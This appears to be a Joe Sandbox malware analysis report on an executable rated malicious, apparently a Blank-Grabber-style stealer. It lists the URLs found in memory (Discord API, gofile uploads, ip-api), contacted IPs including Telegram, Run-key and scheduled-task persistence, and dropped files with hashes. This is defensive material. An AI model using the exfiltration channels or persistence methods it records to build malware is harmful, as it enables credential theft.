https://google.com/mail	sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	false
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBAE000.00000004.00000020.00020000.00000000.sdmp	false
https://www.python.org/psf/license/)	sB2ClgrGng.exe, 00000001.00000002.2197225283.00007FFDFB442000.00000040.00000001.01000000.00000004.sdmp	false
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py	sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://www.iqiyi.com/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://foss.heptapod.net/pypy/pypy/-/issues/3539	sB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA5E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp	false
http://google.com/	sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF2E000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186967243.00000281ABF23000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABF13000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF24000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF1D000.00000004.00000020.00020000.00000000.sdmp	false
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	sB2ClgrGng.exe, 00000001.00000003.1892823881.00000281AC9AF000.00000004.00000020.00020000.00000000.sdmp	false
https://api.gofile.io/getServerr	sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	false
http://ocsp.sectigo.com0	sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	false
https://tools.ietf.org/html/rfc7231#section-4.3.6)	sB2ClgrGng.exe, 00000001.00000003.1784156958.00000281ABEF0000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA0F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189091027.00000281ABA0F000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784156958.00000281ABEE0000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/License	powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmp	false
https://discordapp.com/api/v9/users/	sB2ClgrGng.exe, 00000001.00000002.2189456125.00000281ABB20000.00000004.00001000.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1784233182.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1810702061.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1900869577.00000281ABA75000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1852816239.00000281ABA73000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source	sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmp	false
http://ip-api.com/json/?fields=225545r	sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec	sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188663974.00000281AB55C000.00000004.00001000.00020000.00000000.sdmp	false
https://github.com/urllib3/urllib3/issues/2920	sB2ClgrGng.exe, 00000001.00000002.2191721671.00000281AC330000.00000004.00001000.00020000.00000000.sdmp	false
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189355250.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164621490.00000281ACBF5000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031411910.00000281ACBF4000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF4C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2184336077.00000281ABA70000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031480408.00000281ABA66000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBD1000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164533332.00000281ABA6D000.00000004.00000020.00020000.00000000.sdmp	false
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	false
https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data	sB2ClgrGng.exe, 00000001.00000003.1765775623.00000281AB60C000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2188382177.00000281A9C51000.00000004.00000020.00020000.00000000.sdmp	false
https://yahoo.com/	sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	false
https://account.bellmedia.c	sB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC52C000.00000004.00001000.00020000.00000000.sdmp	false
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngp_U	sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp	false
http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6	sB2ClgrGng.exe, 00000001.00000003.2030259986.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2189723544.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABEC3000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/ProdV2	svchost.exe, 00000020.00000003.1849613191.000002224F0C2000.00000004.00000800.00020000.00000000.sdmp	false
https://login.microsoftonline.com	sB2ClgrGng.exe, 00000001.00000003.2165800360.00000281AC9C6000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC51C000.00000004.00001000.00020000.00000000.sdmp	false
http://crl.thawte.com/ThawteTimestampingCA.crl0	sB2ClgrGng.exe, 00000000.00000003.1760688256.000001D37210F000.00000004.00000020.00020000.00000000.sdmp	false
https://html.spec.whatwg.org/multipage/	sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	false
https://www.ifeng.com/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4A8000.00000004.00001000.00020000.00000000.sdmp	false
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#tls-warnings	sB2ClgrGng.exe, 00000001.00000002.2191571952.00000281AC220000.00000004.00001000.00020000.00000000.sdmp	false
https://www.zhihu.com/	sB2ClgrGng.exe, 00000001.00000002.2192067686.00000281AC4C4000.00000004.00001000.00020000.00000000.sdmp	false
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	sB2ClgrGng.exe, 00000001.00000003.2029385987.00000281ACBAE000.00000004.00000020.00020000.00000000.sdmp	false
https://www.rfc-editor.org/rfc/rfc8259#section-8.1	sB2ClgrGng.exe, 00000001.00000003.1813675437.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1898231432.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2031644864.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000002.2190334211.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2164729393.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1872240712.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1907329312.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1843699138.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.2186245012.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp, sB2ClgrGng.exe, 00000001.00000003.1878461049.00000281ABF76000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/	powershell.exe, 00000033.00000002.1994798538.000001F235050000.00000004.00000800.00020000.00000000.sdmp	false
https://oneget.orgX	powershell.exe, 00000033.00000002.1942613111.000001F226496000.00000004.00000800.00020000.00000000.sdmp	false
https://api.gofile.io/getServer	sB2ClgrGng.exe, 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp	false
https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png	sB2ClgrGng.exe, 00000001.00000002.2188979517.00000281AB820000.00000004.00001000.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
198.23.219.104	unknown	United States	36352	AS-COLOCROSSINGUS	true
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532621
Start date and time:	2024-10-13 19:00:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 16m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	112
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	sB2ClgrGng.exe renamed because original name is a hash value
Original Sample Name:	d69647cf1c96e058e4a9ed4887cc08a36c863751e711f98171e32cdc36478eda.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@172/70@2/4
EGA Information:	Successful, ratio: 28.6%
HCA Information:	Successful, ratio: 57% Number of executed functions: 94 Number of non-executed functions: 187
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 216.58.206.67, 184.28.90.27
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, gstatic.com, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 7272 because there are no executed function
Execution Graph export aborted for target powershell.exe, PID 7224 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8556 because it is empty
Execution Graph export aborted for target word.exe, PID 4048 because it is empty
Execution Graph export aborted for target word.exe, PID 5288 because it is empty
Execution Graph export aborted for target word.exe, PID 7316 because it is empty
Execution Graph export aborted for target word.exe, PID 7956 because it is empty
Execution Graph export aborted for target word.exe, PID 8364 because it is empty
Execution Graph export aborted for target word.exe, PID 8684 because it is empty
Execution Graph export aborted for target word.exe, PID 8912 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
13:01:14	API Interceptor	172x Sleep call for process: powershell.exe modified
13:01:14	API Interceptor	5x Sleep call for process: WMIC.exe modified
13:01:17	API Interceptor	3x Sleep call for process: svchost.exe modified
13:01:22	API Interceptor	14430201x Sleep call for process: bound.exe modified
18:01:19	Task Scheduler	Run new task: word path: C:\Users\user\AppData\Roaming\word.exe
18:01:22	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run word C:\Users\user\AppData\Roaming\word.exe
18:01:30	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run word C:\Users\user\AppData\Roaming\word.exe
18:01:38	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\word.lnk

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.363788168458258
Encrypted:	false
SSDEEP:	6:6xPoaaD0JOCEfMuaaD0JOCEfMKQmDNOxPoaaD0JOCEfMuaaD0JOCEfMKQmDN:1aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
MD5:	0E72F896C84F1457C62C0E20338FAC0D
SHA1:	9C071CC3D15E5BD8BF603391AE447202BD9F8537
SHA-256:	686DC879EA8690C42D3D5D10D0148AE7110FA4D8DCCBF957FB8E41EE3D4A42B3
SHA-512:	AAA5BE088708DABC2EC9A7A6632BDF5700BE719D3F72B732BD2DFD1A3CFDD5C8884BFA4951DB0C499AF423EC30B14A49A30FBB831D1B0A880FE10053043A4251
Malicious:	false
Reputation:	unknown
Preview:	*.>...........&.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................&.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3107478092907292
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrQ:KooCEYhgYEL0In
MD5:	C849D8846F5316DB6B3E90C1908D8E86
SHA1:	B23B96BF33E124180492BF908144461DFD56FF58
SHA-256:	E15DCD4770F6A9581F7050E7FA856FE782DD67C652CF8C9D776BF7AC265EEC37
SHA-512:	71F69C5DB2FBC141FDACD24C881EA90992E2F028B20A2037182AD3AC27ACEB2313977DEF31CB136FA043C8F0833C24A82FF40322C5290BD49CCCE9ACF025D61B
Malicious:	false
Reputation:	unknown
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x86cff748, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.4221113835612634
Encrypted:	false
SSDEEP:	1536:/SB2ESB2SSjlK/uedMrSU0OrsJzvqYkr3g16f2UPkLk+ku4/Iw4KKazAkUk1k2DO:/azag03A2UrzJDO
MD5:	13F44D5FCA035C9F7D003951B9B40C47
SHA1:	C5F709360FAA337735BCB01F3F662BD5FB491D5D
SHA-256:	63395BF7E22B102E8F66872F0BC6123AABC890F82F2E640BF2FD3C15262E3B67
SHA-512:	DA7F7A645E4331B6BA1D70372EFECBFFD7E02C64030207D1289306400C59BFBC8BEAA20E2CDB4A7A3EA7FB117119F5898786E948EE5448F4126DCA193224965A
Malicious:	false
Reputation:	unknown
Preview:	...H... .......Y.......X\...;...{......................n.%..... ....\|.......\|..h.#..... ....\|..n.%.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................j.n ....\|...................]u2 ....\|...........................#......n.%.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07496313242742787
Encrypted:	false
SSDEEP:	3:i/OetYeA9yZu+ySv1NZkBllOE/tlnl+/rTc:i/rzCKu+ySv1LkTpMP
MD5:	6EEC32E61219C251020085A3F7E3F4BD
SHA1:	02FC37108EB58BDBB88404A091A4CB8E8CA5B16D
SHA-256:	0D27A0769B13D4D427449D921F12EA2AB014377901D7769B6F1A1C1F755D9AF6
SHA-512:	DF1D8C06E41D5142710A6AD353C04E162B417FF1736E3E3780DB4253CA8FEF08684741D3108AB1056E8A668A132C1A571BC6522FD9B04A56A0328AA4A1DD5B48
Malicious:	false
Reputation:	unknown
Preview:	........................................;...{.......\|.. ....\|.......... ....\|.. ....\|...`.. ....\|...................]u2 ....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\word.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\word.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	654
Entropy (8bit):	5.380476433908377
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
MD5:	30E4BDFC34907D0E4D11152CAEBE27FA
SHA1:	825402D6B151041BA01C5117387228EC9B7168BF
SHA-256:	A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
SHA-512:	89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Reputation:	unknown
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\ \Display (1).png

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	680924
Entropy (8bit):	7.925479637764179
Encrypted:	false
SSDEEP:	12288:tQqK4s5SF/1cJ8n0Ac5jp4SypxFb6V7jfWrOzx1KsnWkqO2yusLGdf:+9C/a6cZp4hwz6YFKyusu
MD5:	5C131EF780F05DED43C14E6F04BECF7D
SHA1:	D5470AF7673CA297A06C99EBE6592C6A98C3EF81
SHA-256:	820B3C32887980546CD22D374DA0DEBCC9262D9D9E621FD2BE2AB443E3D2CC36
SHA-512:	1C2B859EEEE755C397D1DC51BE423543E02E6C3D76F3D9BFDB648400C8C3C774B872853D7CA459BDB31A5A72975AEDC1882AED64CA7FC2E31BC9CF8E88074869
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^......u...}.Q%....;......o.k.9..o..ql.%.. D32.^1.`.7..aL....6.8q.`:.$.Do..".....N.......g.u.ng.#.8...s.....z.\.[...r./k....1.0....g-\...cC...;.3j......;..R#.oB.2..{...8.2p.0..^..S_H0W....n......>...'......g7...t.....O..`...S..3m.8..~..jnc..v...8z....b.G..\|.'.....r.}...'.b ....=S....._^...\|\|..#.k...D..../.3G...V...H.\|..QQ?ty..1...Q...-..........#.....u=P......l.......'.k...}.>vob.......bC../..h.X...!wWs..].....k...Y1x.]#.yK}...v.0..w...w.`..;...Z.Fbv......eL.u.5g...=.>.9.0..........`...L.P<....P.......V.&...0q.x.~...}oN0...w.....b...5L.7....[1/~.....7..^KCm.%iN\|....z.....&.Iq.@,.1N...k..r...9.=.......1....=...{.sKX...s./N.w...M.w[..w<7.m-..=..=...............n.B}..X...g.....n...C{......O.?....O...4j........`....%.w.....s.K..t}\S..l..N..y...9.....g]..f^...w..7B.>..*os.a.x....b/.9q.....Q..n.k.....qNLu.8y 7y..;.1[.....>..TW.vu..V..g.....q-&

C:\Users\user\AppData\Local\Temp\Log.tmp

Download File

Process:	C:\Users\user\AppData\Local\Temp\bound.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	41
Entropy (8bit):	3.7195394315431693
Encrypted:	false
SSDEEP:	3:rRSFYJKXzovNsr4rNrn:EFYJKDoWrcBn
MD5:	0DB526D48DAB0E640663E4DC0EFE82BA
SHA1:	17AC435DAFEA6FF9F4D6F83FA6C54F9800F43724
SHA-256:	934290A76F9E1804069D8ED6515B14101D9D8ABA2EACBF5B260F59941C65340E
SHA-512:	FACD013E1B5B8163214CA8C3A18ADEEC3541153CD69240EEFA76DDD54809186E919C1D635AEA648A8641DE7C3216BEC11C41F04719B60F07EDFDC01FF79027B9
Malicious:	false
Reputation:	unknown
Preview:	....### explorer ###..[WIN]r[WIN]r[WIN]r

C:\Users\user\AppData\Local\Temp\MpCmdRun.log

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	894
Entropy (8bit):	3.110298466615917
Encrypted:	false
SSDEEP:	12:Q58KRBubdpkoPAGdjrZNIocCk9+MlWlLehW51IC4NIocP:QOaqdmOFdjrztcV+kWResLILtcP
MD5:	30BD7B912EBF1F5D5C54A7B8ECEFC1E9
SHA1:	1E22D9DCEBD5A43C079F66A7AE6E8A045CAE664C
SHA-256:	012AEC72B6929A53547C33243631C2AC3D0922800064EBDC8A2DFC9B2FD52C55
